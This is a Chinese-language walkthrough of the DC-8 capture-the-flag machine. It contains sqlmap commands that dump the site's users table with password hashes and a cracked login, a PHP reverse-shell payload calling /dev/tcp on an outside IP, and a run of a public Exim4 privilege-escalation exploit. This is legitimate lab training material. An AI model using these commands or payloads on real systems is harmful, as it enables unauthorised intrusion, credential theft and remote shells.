dc8靶机攻略

dc8

扫描

dc8靶机攻略_第1张图片

image-20231024113041636

dc8靶机攻略_第2张图片

dc8靶机攻略_第3张图片

渗透

先访问主页探查

该主页的url看似存在sql注入

dc8靶机攻略_第4张图片

断点注入一下看看有没有报错

发现报错,存在sql注入

dc8靶机攻略_第5张图片

使用sqlmap

爆库

sqlmap -u http://10.4.7.151 -current-db

dc8靶机攻略_第6张图片

爆表

sqlmap -u http://10.4.7.151/?nid=2 --tables -D "d7db"

dc8靶机攻略_第7张图片

dc8靶机攻略_第8张图片

发现user表

爆列

sqlmap -u 'http://10.4.7.151/?nid=2' -D d7db -T users --columns

dc8靶机攻略_第9张图片

爆数据

sqlmap -u 'http://10.4.7.151/?nid=2' -D d7db -T users -C uid,login,name,pass --dump

dc8靶机攻略_第10张图片

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

等了许久,发现只能解出来一个

dc8靶机攻略_第11张图片

即可使用john登录

john:turtle

dc8靶机攻略_第12张图片

在contactus中找到phpcode执行,因此写入反弹shell

& /dev/tcp/10.4.7.138/12138 0>&1'"); ?>

dc8靶机攻略_第13张图片

在contactus from settings中随意写点什么提交触发一下

dc8靶机攻略_第14张图片

成功获取连接

dc8靶机攻略_第15张图片

提权

使用sudo无果,使用find,发现exim4

dc8靶机攻略_第16张图片

网上搜索的资料

Exim4是一个邮件传输代理(MTA),它是Linux操作系统中的一种邮件服务器软件。Exim4的主要功能是处理电子邮件的传输和路由,它可以接收来自用户的邮件并将其发送到目标邮件地址。Exim4还支持SMTP、POP3、IMAP等邮件协议,可以与其他邮件服务器进行通信。Exim4是一个功能强大的邮件服务器软件,它在Linux系统中被广泛使用。

Exim4在某些情况下可以被滥用以提升特权,这是因为它是一个运行在特权用户(通常是root)下的邮件传输代理。如果存在安全漏洞或配置错误,攻击者可能能够利用这些问题来执行恶意代码或以root权限运行代码。

一些常见的漏洞或配置错误包括:

  1. 缓冲区溢出:如果Exim4的代码中存在缓冲区溢出漏洞,攻击者可能能够通过发送特制的恶意邮件来执行任意代码,从而提升特权。
  2. 非安全配置:如果Exim4的配置文件中存在错误或不安全的设置,攻击者可能能够利用这些配置来执行特权操作。例如,如果Exim4被配置为以root权限运行某些脚本或程序,攻击者可以通过修改这些脚本或程序来提权。
  3. 未修补的漏洞:如果Exim4的版本存在已知的漏洞,并且系统管理员没有及时修补或升级软件,攻击者可能能够利用这些漏洞来获取root权限。

查看一下exim4的版本号

dc8靶机攻略_第17张图片

使用kali查询漏洞,找到一条符合本地提权

dc8靶机攻略_第18张图片

下载46996.sh到本地

直接执行会报错,此处需要本地编辑用set ff=unix保存一下

dc8靶机攻略_第19张图片

使用python3开启web服务传到靶机上的/tmp目录下,要不然权限不够,随后赋权777执行

需要使用第二个参数

./46996.sh -m netcat

随后等待五秒执行成功,获取root

flag在老地方

dc8靶机攻略_第20张图片

你可能感兴趣的:(靶机系列,1024程序员节,网络安全,web安全,安全)